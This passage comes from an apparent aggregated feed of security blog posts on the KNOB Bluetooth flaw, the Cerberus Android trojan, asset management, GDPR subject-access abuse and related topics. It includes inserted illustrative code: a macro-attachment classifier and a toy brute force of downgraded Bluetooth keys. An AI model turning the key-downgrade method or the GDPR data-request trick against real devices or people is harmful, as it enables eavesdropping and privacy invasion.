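    with zipfile.ZipFile(io.BytesIO(data)) as package:
        names = package.namelist()
        if "[Content_Types].xml" not in names:
            return "not-office"
        if any(name.lower().endswith("vbaproject.bin") for name in names):
            return "macro"
        content_types = package.read("[Content_Types].xml").decode("utf-8", "replace")
        if VBA_CONTENT_TYPE in content_types:
            return "macro"
    return "clean"


CONTENT_TYPES_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>{overrides}</Types>'
)


def build_sample_document(with_macro: bool) -> bytes:
    """Construct a minimal OOXML-style package for the demo (not a real Word file)."""
    overrides = (
        f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>'
        if with_macro else ""
    )
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as package:
        package.writestr("[Content_Types].xml", CONTENT_TYPES_XML.format(overrides=overrides))
        package.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            package.writestr("word/vbaProject.bin", b"\x00" * 64)  # placeholder VBA storage
    return buffer.getvalue()


if __name__ == "__main__":
    samples = {  # constructed attachments; the .docx name on the macro file is deliberate
        "report.docx": build_sample_document(with_macro=False),
        "invoice.docx": build_sample_document(with_macro=True),
        "old.doc": OLE_MAGIC + b"\x00" * 504,
        "notes.pdf": b"%PDF-1.4 constructed placeholder",
    }
    for filename, data in samples.items():
        print(f"{filename}: {classify_attachment(data)}")
```

The legacy-binary branch is the edge case worth keeping: a gateway that only understands the ZIP-based formats must not let the old OLE formats through as “clean” just because it found no vbaProject.bin.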

Secure browsing

Web browsers are one of the most heavily used channels for malware delivery, and everyone knows it.

Hence –

  • Always keep your browser updated
  • Avoid downloading pirated or cracked media or software from torrent and similar sites
  • Block pop-up ads in the browser
  • Always verify that you are on the genuine site by checking the address bar of the browser; phishing sites can look identical to the real thing
  • Bookmark important sites and use the bookmarks to reach them, so a look-alike link in an email never gets a chance
  • Do not share personal details such as name, contact number, email ID or social-networking credentials with any unknown website
  • Do not install browser extensions you are not fully aware of. Look out for impersonating web pages, do not accept any prompt on an unknown page you are visiting, and avoid cracked-software download sites
  • Policies should be clearly communicated to employees who opt for BYOD (Bring Your Own Device)
  • Policies for using official applications on platforms outside the office infrastructure should be established


Lastly, disable the autorun feature for pen drives if it is not needed, and regularly educate employees on cybersecurity best practices.

Seqrite is the flagship enterprise product of Quick Heal Technologies, an industry major that has long championed the importance of cybersecurity. We hope this educational document helps.

Please get in touch with us for any specific questions.

The post Essential practices to strengthen your business’ cybersecurity appeared first on Seqrite Blog.

“KNOB” Security Flaw Exploits All Versions Of Bluetooth Devices

There are times when a technology becomes so ubiquitous and so accessible that it turns into a favourite target of cybercriminals. The discovery of a vulnerability by security researchers is a good thing, but it may be just the tip of the iceberg. One such technology is Bluetooth, where each new version of the specification adds features and fixes weaknesses in earlier versions. The latest version at the time of this writing is Bluetooth v5.1.

Now a critical security flaw, tracked as CVE-2019-9506, has been disclosed by the Center for IT-Security, Privacy and Accountability (CISPA) in partnership with Amazon, Apple, Intel, Microsoft and Cisco. Credit goes to the following researchers: Prof. Kasper Rasmussen, University of Oxford, England; Dr. Nils Ole Tippenhauer, CISPA, Germany; and Daniele Antonioli, SUTD, Singapore. The attack was demonstrated publicly at the USENIX Security Symposium, ongoing at the time of this writing. The group calls the vulnerability KNOB (Key Negotiation of Bluetooth), and it affects every Bluetooth BR/EDR device built to any version of the specification from 1.0 to 5.1. It lets an attacker gut the encryption of a Bluetooth link by forcing the negotiated encryption key length down to a single octet. A one-byte key has only 256 possible values, so a trivial brute-force search recovers it and the otherwise secure encryption falls.

“The researchers identified that it is possible for an attacking device to interfere with the procedure used to set up encryption on a BR/EDR connection between two devices in such a way as to reduce the length of the encryption key used. In addition, since not all Bluetooth specifications mandate a minimum encryption key length, it is possible that some vendors may have developed Bluetooth products where the length of the encryption key used on a BR/EDR connection could be set by an attacking device down to a single octet,” explained the Bluetooth Special Interest Group (SIG) in its security notice.

A successful brute force hands the attacker the link’s encryption key, and with it the ability to decrypt and inject traffic as a man-in-the-middle between the two Bluetooth devices: inserting Bluetooth commands, capturing keystrokes, and monitoring the personal area network (PAN, the network Bluetooth devices form among themselves). Note that KNOB attacks the key negotiation that happens when a connection is encrypted, not the pairing itself; the long-term link key established at pairing is not exposed, only the session encryption key derived from it.

The good news is that the attack is not easy to pull off. Both devices must be establishing a BR/EDR connection (Bluetooth Low Energy negotiates keys differently and is not affected by this flaw), and both must accept the reduced key size. Because this is Bluetooth, the attacker has to be within radio range of both devices and must intercept and rewrite the key-size negotiation messages in both directions within the short window in which they are exchanged. And because the encryption key is renegotiated every time the link is re-established, the attack has to be repeated for every new connection; unpairing the devices also discards the key.

“Bluetooth SIG has updated the Bluetooth Core Specification to recommend a minimum encryption key length of 7 octets for BR/EDR connections. The Bluetooth SIG will also include testing for this new recommendation within our Bluetooth Qualification Program. In addition, the Bluetooth SIG strongly recommends that product developers update existing solutions to enforce a minimum encryption key length of 7 octets for BR/EDR connections,” the SIG concluded.
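To make the key-size point concrete, here is an added example (not the researchers’ code and not a Bluetooth implementation) that models the negotiation and the brute-force cost. The stream cipher is a SHA-256 counter-mode stand-in for E0, the link key and the “predictable header” plaintext are constructed, and reduce_entropy simply truncates the key, so only the size of the search space is faithful to the real attack:

```python
import hashlib
from itertools import product
from typing import Optional, Tuple

# Added example, not the researchers' code. The cipher below is a SHA-256 counter-mode
# stand-in for Bluetooth's E0: only the key size matters for the point being made.
MIN_KEY_OCTETS = 7  # minimum the Bluetooth SIG now recommends for BR/EDR
LINK_KEY = bytes.fromhex("c7a15e2b9d04f6a3e8b17c5d2f0a9e64")  # constructed 16-byte link key
KNOWN_PREFIX = b"HCI-ACL"                                    # constructed predictable header
MESSAGE = KNOWN_PREFIX + b" keystrokes: p a s s"             # constructed payload


def negotiate_key_size(local_max: int, peer_request: int,
                       minimum: int = MIN_KEY_OCTETS) -> Optional[int]:
    """Model of the BR/EDR entropy negotiation: the smaller proposal wins. A KNOB
    attacker rewrites the in-flight proposals to 1. The fix is to refuse (None) any
    agreed size below the minimum instead of silently accepting it."""
    agreed = min(local_max, peer_request)
    return agreed if agreed >= minimum else None


def reduce_entropy(link_key: bytes, key_octets: int) -> bytes:
    """Stand-in for the spec's key-size reduction: only key_octets bytes of entropy remain."""
    return link_key[:key_octets]


def keystream(key: bytes, length: int) -> bytes:
    """Toy keystream: SHA-256 of key || counter, concatenated until long enough."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def encrypt(key: bytes, plaintext: bytes) -> bytes:
    return bytes(p ^ k for p, k in zip(plaintext, keystream(key, len(plaintext))))


def brute_force(ciphertext: bytes, known_plaintext: bytes,
                key_octets: int) -> Tuple[Optional[bytes], int]:
    """Try all 256**key_octets keys against a known-plaintext prefix (link-layer
    headers are predictable). Returns (key, attempts) or (None, attempts)."""
    target = ciphertext[:len(known_plaintext)]
    attempts = 0
    for candidate in product(range(256), repeat=key_octets):
        attempts += 1
        key = bytes(candidate)
        if encrypt(key, known_plaintext) == target:
            return key, attempts
    return None, attempts


def attack(key_octets: int) -> Tuple[bool, int]:
    """Encrypt MESSAGE under a key reduced to key_octets and try to recover it."""
    effective_key = reduce_entropy(LINK_KEY, key_octets)
    ciphertext = encrypt(effective_key, MESSAGE)
    recovered, attempts = brute_force(ciphertext, KNOWN_PREFIX, key_octets)
    return recovered == effective_key, attempts


if __name__ == "__main__":
    print("negotiated without the fix:", negotiate_key_size(16, 1, minimum=1))
    print("negotiated with the fix:   ", negotiate_key_size(16, 1))
    for octets in (1, 2):
        ok, attempts = attack(octets)
        print(f"{octets}-octet key recovered={ok} after {attempts} of {256 ** octets} candidates")
    print(f"{MIN_KEY_OCTETS}-octet key: {256 ** MIN_KEY_OCTETS:.2e} candidates (2^56)")
```

negotiate_key_size is the fix in miniature: a patched stack refuses the link when the agreed size is below the minimum instead of carrying on with a 1-octet key. Note what the 7-octet floor buys and what it does not: 256**7 is 2^56 candidates, far short of the 128-bit security the full key offers, but it turns a 256-guess attack that finishes inside a single connection into one that does not.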

Also read:

New Hacking Technique Using Bluetooth Exposed

Intel Discovers And Publishes New Bluetooth Vulnerability

DefCon 2018: Bluetooth Low Energy Sniffing Tool Publicly Available

The post “KNOB” Security Flaw Exploits All Versions Of Bluetooth Devices appeared first on .

The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data

A new banking trojan has emerged, and it is going after Android devices. Dubbed Cerberus, this remote access trojan lets a distant attacker take over an infected Android device, conduct overlay attacks, take control of SMS, and harvest the victim’s contact list. What’s more, the author of Cerberus rents the trojan out to other cybercriminals as a means of spreading these attacks.

According to The Hacker News, the author claims the malware was written from scratch and reuses no code from existing banking trojans. Researchers who analyzed a sample found a fairly standard feature set: taking screenshots, hijacking SMS messages, stealing contact lists, stealing account credentials, and more.

Once it infects an Android device, Cerberus hides its icon from the application drawer and then poses as “Flash Player Service” to persuade the user to grant it the Accessibility Service permission. If the permission is granted, Cerberus registers the compromised device with its command-and-control server, allowing the attacker to control the device remotely. To steal a victim’s credit card number or banking credentials, Cerberus launches screen overlay attacks: it draws a fake login screen on top of a legitimate mobile banking app and tricks the user into entering credentials into it. Cerberus already ships overlays for 30 unique banking and other target apps.

So, what can Android users do to secure their devices from the Cerberus banking trojan? Check out the following tips to help keep your financial data safe:

  • Be careful what you download. Cerberus malware relies on social engineering tactics to make its way onto a victim’s device. Therefore, think twice about what you download or even plug into your device.
  • Click with caution. Only click on links from trusted sources. If you receive an email or text message from an unknown sender asking you to click on a suspicious link, stay cautious and avoid interacting with the message altogether.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data appeared first on McAfee Blogs.

How to Build Your 5G Preparedness Toolkit

5G has been nearly a decade in the making but has really dominated the mobile conversation in the last year or so. This isn’t surprising considering the potential benefits this new type of network will provide to organizations and users alike. However, just like with any new technological advancement, there are a lot of questions being asked and uncertainties being raised around accessibility, as well as cybersecurity. The introduction of this next-generation network could open more avenues for cyberthreats, potentially increasing the likelihood of distributed denial-of-service (DDoS) attacks because of the sheer number of connected devices. However, as valid as these concerns may be, we may be getting a bit ahead of ourselves. While 5G has gone from an idea to a reality in a short amount of time for a handful of cities, these advancements haven’t happened without a series of setbacks and speed bumps.

In April 2019, Verizon was the first to launch a next-generation network, with other cellular carriers following closely behind. While a technological milestone in and of itself, some 5G networks are only available in select cities, even limited to just specific parts of the city. Beyond the not-so widespread availability of 5G, internet speeds of the network have performed at a multitude of levels depending on the cellular carrier. Even if users are located in a 5G-enabled area, if they are without a 5G-enabled phone they will not be able to access all the benefits the network provides. These three factors – user location, network limitation of certain wireless carriers, and availability of 5G-enabled smartphones – must align for users to take full advantage of this exciting innovation.

While there is still a lot of uncertainty surrounding the future of 5G, as well as what cyberthreats may emerge as a result of its rollout, there are a few things users can do to prepare for the transition. To get your cybersecurity priorities in order, take a look at our 5G preparedness toolkit to ensure you’re prepared when the nationwide roll-out happens:

  • Follow the news. Since the announcement of a 5G-enabled network, stories surrounding the network’s development and updates have been at the forefront of the technology conversation. Be sure to read up on all the latest to ensure you are well-informed to make decisions about whether 5G is something you want to be a part of now or in the future.
  • Do your research. With new 5G-enabled smartphones about to hit the market, ensure you pick the right one for you, as well as one that aligns with your cybersecurity priorities. The right decision for you might be to keep your 4G-enabled phone while the kinks and vulnerabilities of 5G get worked out. Just be sure that you are fully informed before making the switch and that all of your devices are protected.
  • Change the factory default settings on your IoT devices. 5G will bring more and more IoT products online, and most of them are not designed “security first.” A device can be vulnerable the moment the box is opened, and cybercriminals know how to get into IoT devices through default credentials and settings. Changing the default password and switching off features you don’t use immediately improves the device’s security and helps keep your home network secure.
  • Add an extra layer of security. As mentioned, with 5G creating more avenues for potential cyberthreats, it is a good idea to invest in comprehensive mobile security to apply to all of your devices to stay secure while on the go or at home.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post How to Build Your 5G Preparedness Toolkit appeared first on McAfee Blogs.

What is NERC?

NERC CIP Standards Background and Basics. The North American Electric Reliability Corporation (NERC) is an international regulatory organization that works to reduce risks to power grid infrastructure. It does this through the continual development of a set of regulatory standards, in addition to education, training, and certifications for industry personnel. NERC Subcommittees: NERC manages several […]

The post What is NERC? appeared first on The State of Security.

How Axonius integrates with Microsoft to help customers solve the cybersecurity asset management challenge

Despite the amazing and futuristic progression of technologies in cybersecurity, it’s still incredibly hard to answer the most basic of questions like: how many assets do I have, and do they adhere to my security policy? Somewhere along the line, asset management became very mundane compared to the other initiatives we’re responsible for in cybersecurity. Yet everything in cybersecurity lies on a foundation of understanding our devices, cloud instances, users, and the solutions that cover them.

So why is asset management—a problem that has persisted for decades—still an issue in 2019? Today, we look at why asset management remains a challenge, the Axonius approach to cybersecurity asset management, and how integrations with several Microsoft technologies are key to solving the problem and delivering value to organizations around the world.

The cybersecurity solution paradox

The more devices you have, the more solutions you implement to manage and secure them. Although one might think that the more security and management solutions at an organization the better, that’s not always the case. We call this the cybersecurity solution paradox: the idea that the more solutions you have, the harder it actually becomes to get answers to very basic questions. All of the information exists in separate silos, making it more difficult to aggregate the data, correlate it, and derive context and meaning.

Watch this short video outlining today’s asset management challenge.

The Axonius approach

If we were to outline an approach to asset management, we’d want a product to:

  1. Understand which assets are unmanaged—Those devices and cloud instances not being managed or secured by the tools outlined in our security policies.
  2. Understand which managed assets are missing agents—For example, which Windows 10 devices are missing an endpoint agent?
  3. Discover new devices—Any time a new device hits the network, we’d want to know whether it adheres to our security policies.
  4. Give context—If our security operations team gets an alert about a device, we would want to understand what the device is, what’s installed, its patch level, known vulnerabilities, which users have signed in, etc.

To get this information, a product would need to be very simple, agentless, and it would:

  1. Connect to every security and management solution that knows about assets.
  2. Collect and normalize all relevant asset and user information.
  3. Correlate the information to know that every asset is unique.
  4. Understand the relationship between users, devices, cloud instances, and the solutions that manage and secure them.
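The four steps above, as an added example (not Axonius code): constructed inventories stand in for adapter output, records are normalized to a shared identifier scheme, merged into unique assets wherever they share a hostname or MAC, and then queried for the two questions the earlier list opens with. Host names, MACs and IPs are all made up:

```python
from typing import Dict, List, Set, Tuple

# Added example, not Axonius code: the correlation steps above on constructed sample
# inventories standing in for adapter output (Active Directory, Intune, an EDR
# console and a network scan). Real adapters return far more fields than these.
ACTIVE_DIRECTORY = [
    {"hostname": "WS-0101.corp.example", "os": "Windows 10"},
    {"hostname": "WS-0102.corp.example", "os": "Windows 10"},
    {"hostname": "SRV-DB01.corp.example", "os": "Windows Server 2016"},
]
INTUNE = [
    {"deviceName": "ws-0101", "os": "Windows 10", "mac": "AA-BB-CC-00-00-01"},
    {"deviceName": "ws-0103", "os": "Windows 10", "mac": "AA-BB-CC-00-00-03"},
]
EDR_AGENTS = [
    {"host": "WS-0101", "agent_version": "6.2"},
    {"host": "WS-0103", "agent_version": "6.2"},
]
NETWORK_SCAN = [
    {"ip": "10.0.5.10", "mac": "aa:bb:cc:00:00:01"},
    {"ip": "10.0.5.12", "mac": "aa:bb:cc:00:00:03"},
    {"ip": "10.0.5.40", "mac": "aa:bb:cc:00:00:40"},  # seen on the wire, known to nothing else
]

Identifier = Tuple[str, str]                            # ("host", "ws-0101") or ("mac", "aa:bb:...")
Record = Tuple[str, Set[Identifier], Dict[str, str]]    # (source, identifiers, attributes)


def norm_host(name: str) -> str:
    """Strip the domain suffix and lower-case: 'WS-0101.corp.example' -> 'ws-0101'."""
    return name.split(".")[0].lower()


def norm_mac(mac: str) -> str:
    return mac.replace("-", ":").lower()


def load_records() -> List[Record]:
    """Steps 1-2: collect from every source and normalize into one identifier scheme."""
    records: List[Record] = []
    for r in ACTIVE_DIRECTORY:
        records.append(("ad", {("host", norm_host(r["hostname"]))}, {"os": r["os"]}))
    for r in INTUNE:
        records.append(("intune", {("host", norm_host(r["deviceName"])),
                                   ("mac", norm_mac(r["mac"]))}, {"os": r["os"]}))
    for r in EDR_AGENTS:
        records.append(("edr", {("host", norm_host(r["host"]))},
                        {"edr_version": r["agent_version"]}))
    for r in NETWORK_SCAN:
        records.append(("netscan", {("mac", norm_mac(r["mac"]))}, {"ip": r["ip"]}))
    return records


def correlate(records: List[Record]) -> List[dict]:
    """Step 3: merge records that share any identifier into one unique asset. A record
    carrying both a hostname and a MAC (Intune here) bridges the name-based sources
    (AD, EDR) and the address-based one (network scan)."""
    assets: List[dict] = []
    for source, ids, attrs in records:
        matches = [a for a in assets if a["ids"] & ids]
        merged = {"ids": set(ids), "sources": {source}, "attrs": dict(attrs)}
        for a in matches:
            merged["ids"] |= a["ids"]
            merged["sources"] |= a["sources"]
            merged["attrs"] = {**a["attrs"], **merged["attrs"]}
        assets = [a for a in assets if not any(a is m for m in matches)]
        assets.append(merged)
    return assets


def name_of(asset: dict) -> str:
    hosts = sorted(v for k, v in asset["ids"] if k == "host")
    macs = sorted(v for k, v in asset["ids"] if k == "mac")
    return hosts[0] if hosts else macs[0]


def windows10_missing_edr(assets: List[dict]) -> List[str]:
    """Step 4, question 2 above: Windows 10 devices without the endpoint agent."""
    return sorted(name_of(a) for a in assets
                  if a["attrs"].get("os") == "Windows 10" and "edr" not in a["sources"])


def unmanaged(assets: List[dict], managers: Tuple[str, ...] = ("ad", "intune")) -> List[str]:
    """Question 1 above: assets seen on the network but known to no management tool."""
    return sorted(name_of(a) for a in assets if not (a["sources"] & set(managers)))


if __name__ == "__main__":
    inventory = correlate(load_records())
    print("unique assets:", len(inventory))
    print("Windows 10 without EDR agent:", windows10_missing_edr(inventory))
    print("unmanaged devices:", unmanaged(inventory))
```

The bridging record matters: the network scan knows only MACs and the EDR console only host names, so without a source that carries both (Intune here) the unknown device and the agent gap would be reported against two different, un-joinable identities. That is the solution paradox in miniature: each tool’s inventory is correct and none of them can answer the question alone.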

This is exactly the approach we took in building the Axonius cybersecurity asset management platform. By connecting to over 130 management and security solutions, Axonius is able to:

  • Give customers a credible, comprehensive asset inventory—We include every desktop, laptop, mobile device, virtual machine, server, cloud instance, and IoT device that is managed and unmanaged, cloud or on-premises.
  • Uncover security solution coverage gaps—Using pre-built and custom queries, customers can understand how every asset stacks up against their policies.
  • Automatically validate and enforce security policies—Customers can create automated enforcement sets to take action whenever assets do not adhere to their security policies.

Axonius is integrated with Microsoft Intune and Azure Active Directory (Azure AD), core products in the Microsoft Intelligent Security Association (MISA). To help customers better understand exactly what assets they have and whether their assets and users adhere to their security policies, Axonius builds upon Intune by connecting to networking gear itself to learn about assets that aren’t being managed. If your policy states that every mobile device needs to have another security or management solution, Axonius can easily identify those devices that aren’t being protected.

Let’s look at two specific examples that show how Axonius customers use integrations with Microsoft to solve their asset management challenges.

How Appsflyer uses Axonius for better asset management

When Guy Flechter joined mobile attribution and analytics leader AppsFlyer in January 2018 as its chief information security officer, he began implementing a wide-ranging cybersecurity program to protect a heterogeneous environment. After implementing the best security tools for every device type, the AppsFlyer team realized that they needed an automated way to ensure that every device had the required solutions installed, and that users had the correct permissions to adhere to the overall security policy.

“We needed an easy and automated way to have clear visibility into which agents were missing from each device, and a way to know when users had rights that conflicted with our security policies. For example, I want to immediately see all Windows devices missing an endpoint agent and unmanaged devices in various VLANs. These are really foundational elements of any cybersecurity program, and there were no good ways to get the answers,” said Flechter.

Using simple queries in Axonius, Flechter was able to get this level of visibility in minutes:

Moving from configuration manager to Intune: No device left behind

As part of their initiative to be nimble and cloud first, AppsFlyer wanted to move from on-premises Microsoft System Center Configuration Manager (ConfigMgr) to Intune, yet the team needed a way to make sure that no devices were left behind. Using queries from Axonius, Flechter was able to easily monitor the switch to Intune and could prioritize which assets should be moved and in what order. Watch this video to learn more.

Understanding user permissions

In addition to devices, Axonius customers are able to understand how each user compares to the overall security policy. Using information from Active Directory, Azure AD, and other IAM providers, customers are able to understand whenever a user account deviates from what is expected.

Example query showing users with bad configurations.

Learn more

To learn more about how the Axonius cybersecurity asset management platform and its many integrations with Microsoft and other leading security and management providers can help your organization, visit Axonius.com. Also, visit the MISA website to learn more about how top security companies are partnering with Microsoft to defend against increasingly sophisticated cyberthreats.

About Axonius

Axonius is the cybersecurity asset management platform that gives organizations a comprehensive asset inventory, uncovers security solution coverage gaps, and automatically validates and enforces security policies. By seamlessly integrating with more than 130 security and management solutions, Axonius is deployed in minutes, improving cyber hygiene immediately. Covering millions of devices at customers like the New York Times, Schneider Electric, and AppsFlyer, Axonius was named the Most Innovative Startup of 2019 at the prestigious RSAC Innovation Sandbox and was named Rookie Security Company of the Year by SC Magazine. For more visit Axonius.com.


The post How Axonius integrates with Microsoft to help customers solve the cybersecurity asset management challenge appeared first on Microsoft Security.

Dorms, Degrees, and Data Security: Prepare Your Devices for Back to School Season

With summer coming to a close, it’s almost time for back to school! Back to school season is an exciting time for students, especially college students, as they take their first steps towards independence and embark on journeys that will shape the rest of their lives. As students across the country prepare to start or return to college, we here at McAfee have revealed new findings indicating that many are not proactively protecting their academic data. Here are the key takeaways from our survey of 1,000 Americans, ages 18-25, who attend or have attended college:

Education Needs to Go Beyond the Normal Curriculum

While many students are focused on classes like biology and business management, very few get the proper exposure to cybersecurity knowledge. 80% of students have been affected by a cyberattack or know a friend or family member who has been affected. However, 43% claim that they don’t think they will ever be a victim of a cybercrime in the future.

Educational institutions are very careful to promote physical safety, but what about cyber safety? It turns out only 36% of American students claim that they have learned how to keep personal information safe through school resources. According to 42% of our respondents, they learn the most about cybersecurity from the news. To help improve cybersecurity education in colleges and universities, these institutions should take a certain level of responsibility when it comes to training students on how they can help keep their precious academic data safe from cybercriminals.

Take Notes on Device Security

Believe it or not, many students fail to secure all of their devices, opening them up to even more vulnerabilities. While half of students have security software installed on their personal computers, this isn’t the case for their tablets or smartphones. Only 37% of students surveyed have smartphone protection, and only 13% have tablet protection. What’s more, about one in five (21%) students don’t use any cybersecurity products at all.

Class Dismissed: Cyberattacks Targeting Education Are on the Rise

According to data from McAfee Labs, cyberattacks targeting education in Q1 2019 have increased by 50% from Q4 2018. The combination of many students being uneducated in proper cybersecurity hygiene and the vast array of shared networks that these students are simultaneously logged onto gives cybercriminals plenty of opportunities to exploit when it comes to targeting universities. Some of the attacks utilized include account hijacking and malware, which made up more than 70% of attacks on these institutions from January to May of 2019. And even though these attacks are on the rise, 90% of American students still use public Wi-Fi and only 18% use a VPN to protect their devices.

Become a Cybersecurity Scholar

In order to go into this school year with confidence, students should remember these security tips:

  • Never reuse passwords. Use a unique password for each one of your accounts, even if it’s for an account that doesn’t hold a lot of personal information. You can also use a password manager so you don’t have to worry about remembering various logins.
  • Always set privacy and security settings. Anyone with access to the internet can view your social media if it’s public. Protect your identity by turning your profiles to private so you can control who can follow you. You should also take the time to understand the various security and privacy settings to see which work best for your lifestyle.
  • Use the cloud with caution. If you plan on storing your documents in the cloud, be sure to set up an additional layer of access security. One way of doing this is through two-factor authentication.
  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to keep your connection secure.
  • Discuss cyber safety often. It’s just as important for families to discuss cyber safety as it is for them to discuss privacy on social media. Talk to your family about ways to identify phishing scams, what to do if you may have been involved in a data breach, and invest in security software that scans for malware and untrusted sites.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Dorms, Degrees, and Data Security: Prepare Your Devices for Back to School Season appeared first on McAfee Blogs.

Exploiting GDPR to Get Private Information

A researcher abused the GDPR to get information on his fiancee:

It is one of the first tests of its kind to exploit the EU's General Data Protection Regulation (GDPR), which came into force in May 2018. The law shortened the time organisations had to respond to data requests, added new types of information they have to provide, and increased the potential penalty for non-compliance.

"Generally if it was an extremely large company -- especially tech ones -- they tended to do really well," he told the BBC.

"Small companies tended to ignore me.

"But the kind of mid-sized businesses that knew about GDPR, but maybe didn't have much of a specialised process [to handle requests], failed."

He declined to identify the organisations that had mishandled the requests, but said they had included:

  • a UK hotel chain that shared a complete record of his partner's overnight stays

  • two UK rail companies that provided records of all the journeys she had taken with them over several years

  • a US-based educational company that handed over her high school grades, mother's maiden name and the results of a criminal background check survey.

CEO Cyber Quiz: What’s Your IT Security IQ?

Every business leader understands that, when it comes to cybersecurity, the stakes are extraordinarily high. CEOs tend to take notice when they read headlines about yet another big-name company being victimized by a massive data breach or about industry forecasts suggesting that the annual cost of crime losses and damage will hit $6 trillion by […]

The post CEO Cyber Quiz: What’s Your IT Security IQ? appeared first on The State of Security.

From unstructured data to actionable intelligence: Using machine learning for threat intelligence

The security community has become proficient in using indicators of compromise (IoC) feeds for threat intelligence. Automated feeds have simplified the task of extracting and sharing IoCs. However, IoCs like IP addresses, domain names, and file hashes are in the lowest levels of the threat intelligence pyramid; they are relatively easy to access and consume, but they’re also easy for attackers to change to evade detection. IoCs are not enough.

Tactics, techniques, and procedures (TTPs) can enable organizations to extract valuable insights like patterns of attack on an enterprise or industry vertical, or trends of attacker techniques in the overall ecosystem. However, TTPs are at the highest level of the threat intelligence pyramid; this information often comes in the form of unstructured texts like blogs, research papers, and incident response (IR) reports, and the process of gathering and sharing these high-level indicators has remained largely manual.

Automating the processing of unstructured text for threat intelligence can benefit threat analysts and customers alike. At my Black Hat session “Death to the IOC: What’s Next in Threat Intelligence”, I presented a system that automates this process using machine learning and natural language processing (NLP) to identify and extract high-level patterns of attack from unstructured text.

Figure 1. Basic structure of system

Trained on documentation of known threats, this system takes unstructured text as input and extracts threat actors, attack techniques, malware families, and relationships to create attacker graphs and timelines.

Data extraction and machine learning

In natural language processing, named entity extraction is a task that aims to classify phrases into pre-defined categories. This is usually a preprocessing step for other more complex tasks like identifying aliases, relationship extraction between actors and TTPs, etc. In our use case, the categories we want to identify are threat actors, malware families, attack techniques, and relationships between entities.

To train our model, our corpus was composed of about 2,700 publicly available documents that describe the actions, behaviors, and tools of various threat actors. On average, each document in this corpus contained about two thousand tokens.

Figure 2. Training data distributions

We also see that the distribution of tokens that fall into one of our predefined categories is very low. On average, only 1% of the tokens are relevant entities. This tells us that we have class imbalance in our data.

Therefore, in addition to using traditional features that are common to natural language processing tasks (for example, lemma, part of speech, orthographic features), we experimented with using custom word embeddings, which allow the identification of relationships between two words that mean the same thing or are used in similar contexts.

Word embeddings are vector representations of words such that the semantic context in which a word appears is captured in the numeric vector. If two words mean the same thing, or are used in the same context frequently, then we would expect the cosine similarity of their word embedding vectors to be high. In other words, in a graphical representation, datapoints for words that mean the same thing or are used in the same context frequently would be relatively close together.

For example, we looked at some clusters of points formed around APT28 and found that the four closest points to it were either aliases (Sofacy, TG-4127) of the threat or were related by attribution (APT29, Dymalloy).

Figure 3. Tensorboard visualization of custom trained embeddings

We experimented with several models suited to a sequence labelling problem and measured performance in two ways—on the whole test dataset and on only the tokens in the test dataset that had not been seen during training. We found that models using conditional random fields (CRFs) trained on both traditional and word embedding features performed best in both scenarios.
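The two kinds of input described in the preceding paragraphs (hand-crafted token features for a CRF, and word embeddings compared by cosine similarity) are shown below in an added example. It is not the post’s own system: the CRF itself is left to a library, lemma and part-of-speech features are omitted because they need an NLP toolkit, and the embeddings are simple co-occurrence counts over a constructed nine-sentence corpus rather than the custom-trained dense vectors the post uses. The actor and malware names (APT28, Sofacy, Emotet, Muddy Water) are the ones the post mentions; the sentences themselves are invented.

```python
"""Added example (not the system described in the post): the two kinds of
input the extractor feeds its sequence labeller, in plain Python.

1. token_features(): orthographic/contextual features for one token, the
   kind of hand-crafted feature a CRF consumes (lemma and part of speech
   would come from an NLP library and are omitted here).
2. cooccurrence_embeddings() + nearest(): count-based word vectors built
   from a constructed mini-corpus, with cosine similarity used to find the
   words that share a context with a threat-actor name.
"""
import math
import re
from collections import Counter

# Constructed sentences in the style of public threat reports. The actor and
# malware names are the ones mentioned in the post; the wording is invented.
CORPUS = [
    "APT28 used spear-phishing against government targets",
    "Sofacy used spear-phishing against diplomatic targets",
    "APT28 deployed custom malware against embassy networks",
    "Sofacy deployed custom malware on embassy networks",
    "APT28 also known as Sofacy",
    "Emotet spreads through spear-phishing emails with macro documents",
    "Emotet uses obfuscated PowerShell and process hollowing",
    "Muddy Water uses obfuscated PowerShell in its attack chain",
    "the report describes attack techniques and malware families",
]

# Function words carry no entity signal and would dominate the counts.
STOPWORDS = {"the", "a", "an", "and", "of", "to", "in", "on", "via", "with",
             "its", "also", "known", "as", "against", "through", "by"}


def tokenize(text):
    return re.findall(r"[A-Za-z0-9-]+", text)


def word_shape(tok):
    """Collapse a token to its character classes: APT28 -> XXXdd."""
    return "".join("X" if c.isupper() else "x" if c.islower()
                   else "d" if c.isdigit() else c for c in tok)


def token_features(tokens, i):
    """Feature dict for tokens[i]: orthographic features plus a one-token
    context window, as a CRF would see them."""
    tok = tokens[i]
    return {
        "lower": tok.lower(),
        "shape": word_shape(tok),
        "is_title": tok.istitle(),
        "is_upper": tok.isupper(),
        "has_digit": any(c.isdigit() for c in tok),
        "has_hyphen": "-" in tok,
        "prefix3": tok[:3].lower(),
        "suffix3": tok[-3:].lower(),
        "prev": tokens[i - 1].lower() if i > 0 else "<BOS>",
        "next": tokens[i + 1].lower() if i + 1 < len(tokens) else "<EOS>",
    }


def cooccurrence_embeddings(corpus, window=2):
    """One sparse vector per word: counts of each other word seen within
    `window` positions. Learned dense embeddings (word2vec and the like)
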